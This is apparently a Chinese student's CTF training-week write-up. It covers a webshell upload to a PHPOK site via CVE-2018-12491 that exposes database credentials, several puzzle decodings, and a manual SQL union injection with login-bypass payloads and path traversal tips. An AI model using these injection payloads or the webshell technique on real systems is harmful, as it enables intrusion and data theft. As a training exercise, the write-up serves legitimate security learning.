竞赛：

设计类程序类数学类安全类-CTF（时间）-作品赛创新创业类

CTF竞赛-夺旗赛解题、攻防、混合
Reverse逆向、Crypto加密、Pwn溢出、web网站、Misc杂项、Mobile_apk
OJ online Jeopardy
安恒平台

弱密码、webshell、注入点、上传点、免杀、提权

阶段二实战

具体解题步骤放在CSDN上了，这里就不上传图片了
实训周 CTF 竞赛 Writeup 总结

1

御剑扫后台
http://192.168.210.73/robots.txt
暴露出目录

User-Agent: *
Allow: /
Disallow: /css/
Disallow: /data/
Disallow: /extension/
Disallow: /framework/
Disallow: /gateway/
Disallow: /images/
Disallow: /js/
Disallow: /langs/
Disallow: /phpinc/
Disallow: /plugin/
Disallow: /res/
Disallow: /task/
Disallow: /tpl/
Disallow: 7df1ad9a81d3a7e1c711aaa8ee0eb7c6

flag就是👆这个

2

BurpSuite 代理抓包后暴力破解
7df1ad9a81d3a7e1c711aaa8ee0eb7c6.php
还是专业版快

3

登陆到后台
admin
phpok.php

4

上传webshell
漏洞：CVE-2018-12491
其中有一个小问题，需要修改图片后缀白名单就好了，然后传图片里

上传文件
附件名称： 1
上传时间： 2025-04-25 11:26:56
存储目录： res/202504/25/
文件名： 1f26fd2b94b55b2a.php
下载次数： 0

这里就搞到真实目录了

flag在：
db.ini.php：

;<?php exit("<h1>Access Denied</h1>");//flag{355a51cd37219b699f013e735b7022b7}?>
file = "mysqli"
host = "127.0.0.1"
port = "3306"
user = "phpok"
pass = "mysql@phpok"
data = "phpok"
socket = ""
debug = false

5

用蚁剑打开数据库链接，找到flag查询语句

阶段三

web环境的几道题:

哆啦A梦生日

太简单的我就不写了，就写个思路了

当铺密码

工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王人人工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王王人工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人人人人人工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王王人工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王工王工王工王工王人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人人人人人人人人人人人人人工王人人人人人人工王工王工王工王工王工王工王人人工王人人人人人人人人人人人人人人人人人人人人人人工王人人人人人人人人人人工王工王工王工王工王工王工王人人工王工王工王工王工王工王工王工王工王人人工王人人人人人人人人人人人人人人工王人人人人人人人人人人工王工王工王工王工王工王工王工王工王人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王工王工王工王工王工王工王工王工王工王工王人人工王人人工王人人人人人人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人工王人人人人人人人人人人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人工王人人人人人人人人人人人人人人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王人人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人人工王人人人人人人人人人人人人人人人人人人人人人人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王人人工王工王工王工王工王工王工王人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人人人人人人人人人人人人人人人人人人人人人人人人人人人人人王人工王王人人人工王王人人人人人人人人人人人人人人人工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王人人人人人人人人人人人人人人人人人人人人人人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人王人人人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王王人工王王人人人工王王人工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王工王人人工王王人工王

解码后：

整理格式：

def format_numbers(input_file, output_file):
    try:
        # 读取输入文件
        with open(input_file, 'r') as file:
            content = file.read().strip()
        
        # 检查内容是否为纯数字
        if not content.isdigit():
            print("错误：文件内容包含非数字字符！")
            return
        
        # 格式化数字，每两位加一个空格
        formatted = ' '.join([content[i:i+2] for i in range(0, len(content), 2)])
        
        # 写入输出文件
        with open(output_file, 'w') as file:
            file.write(formatted)
        
        print(f"格式化完成，结果已保存到 {output_file}")
    
    except FileNotFoundError:
        print("错误：找不到指定的输入文件！")
    except Exception as e:
        print(f"发生错误：{str(e)}")

# 使用示例
input_filename = 'input.txt'  # 输入文件名
output_filename = 'output.txt'  # 输出文件名

format_numbers(input_filename, output_filename)

结果：

46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 33 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 63 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 33 33 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 63 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 46 46 46 46 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 33 33 33 33 33 33 46 33 33 33 46 46 46 46 46 46 46 33 46 33 33 33 33 33 33 33 33 33 33 33 46 33 33 33 33 33 46 46 46 46 46 46 46 33 46 46 46 46 46 46 46 46 46 33 46 33 33 33 33 33 33 33 46 33 33 33 33 33 46 46 46 46 46 46 46 46 46 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 46 46 46 46 46 46 46 46 46 46 33 46 33 46 33 33 33 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 46 33 33 33 33 33 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 46 33 33 33 33 33 33 33 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 33 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 46 33 33 33 33 33 33 33 33 33 33 33 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 33 46 46 46 46 46 46 46 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 33 33 33 33 33 33 33 33 33 33 33 33 33 33 63 46 63 33 46 63 33 33 33 33 33 33 33 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 33 33 33 33 33 33 33 33 33 33 33 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 63 33 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 63 46 63 33 46 63 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 33 46 63 46

十进制转ascii：

………………..!?!!.?………………..?.?!.?….!………….!.?…….!?!!.?!!!!!!?.?!.?!!!!!………….!.?………!?!!.?……..?.?!.?……..!.?……………..!?!!.?!!!!!!!!!!!!!!!!?.?!.?!!!!!!!!!.!!!…….!.!!!!!!!!!!!.!!!!!…….!………!.!!!!!!!.!!!!!………!.?………….!?!!.?…………?.?!.?…………….!.?……………!?!!.?!!!!!!!!!!!!!!?.?!.?!!!.?………….!?!!.?…………?.?!.?………………….!………..!.!.!!!!!.?………….!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!.!!!!!!!.?……………!?!!.?…………..?.?!.?..!.?……………!?!!.?!!!!!!!!!!!!!!?.?!.?!!!.!!!!!!!……………..!.!.?………….!?!!.?…………?.?!.?…………..!.!!!.?………….!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!.?……………!?!!.?…………..?.?!.?….!…….!.?……………!?!!.?!!!!!!!!!!!!!!?.?!.?!!!!!!!………….!.!!!!!!!!!!!!!.?……………..!?!!.?…………….?.?!.?………………….!.?.

Ook密码：
Brainfuck/Ook! Obfuscation/Encoding
flag{7694259648d2affd74f4199dc60cf282}

石头剪刀布:

crypto udp?

使用netcat链接,命令行窗口:
.\nc.exe 192.168.210.64 9999

注意需要命令改变编码,不然会有乱码
chcp 65001

幸运的是服务器出拳顺序是固定的

猜拳输入顺序(需要单身20年的手速):
21120001221012012112

最后根据给出的信息
f{1ca1rfesaaE_ygInE}

栅栏密码:每组4位
f1ag{raI1fEnce_Easy}

新闻网:

手工注入爆库

输入1’产生报错
只有一列，所以只需要一个参数

输入:
1’ union select database()#
得到数据库名attackdb

输入:
1’ union select table_name from information_schema.tables where table_schema=’attackdb’#
得到数据库中的表名:db_news

输入
1’ union select column_name from information_schema.columns where table_name=’db_news’#
得到users表的列名:flag

输入
1’ union select flag from db_news#
得到db_news表的flag列数据

还有一种新SQL万能钥匙

常规万能密码：
admin' or 1=1-- -

或利用注释
username：admin'/*hello
passeord = world*/#'

但是如果都被屏蔽了的话
请使用：

username = secpulse'=' password = secpulse'='

拼接起来就是：
select * from table where username='secpulse'='' and passowrd = 'secpulse'='';

sql解释引擎是从左至右执行：数据库肯定没有 secpulse 这个用户，结果是 false false = ‘’ 结果就是 true 啊

其他

有的web只有前端验证，只要改包或者，禁用JavaScript即可

通过 index.php.bak 搞到密码但是 index.php没有登录界面
尝试直接在 index.php URL后添加 ?user=admin&password=showmetheflag

利用网站下载文件的地址，添加一堆../进入到根目录

最后

撰写writeup
题目描述：
写明题目的名称、内容、分类和难度等信息，这有助于读者对题目有一个初步的了解。
题目分析：
对题目进行深入的分析，包括理解题目的要求、查找相关的资料、分析题目所涉及的技术或概念等。
解题过程：
详细描述解题的步骤、方法和过程截图，包括使用的工具、技术、遇到的挑战以及如何解决这些挑战等。
结果展示：
展示解题的最终结果，包括得到的flag（标志）、分数或其他形式的验证。
总结与反思：
对整个解题过程进行总结，分享解题的经验教训，以及可能的改进方向。

实训记录-周五

Day-4 CTF竞赛实战

竞赛：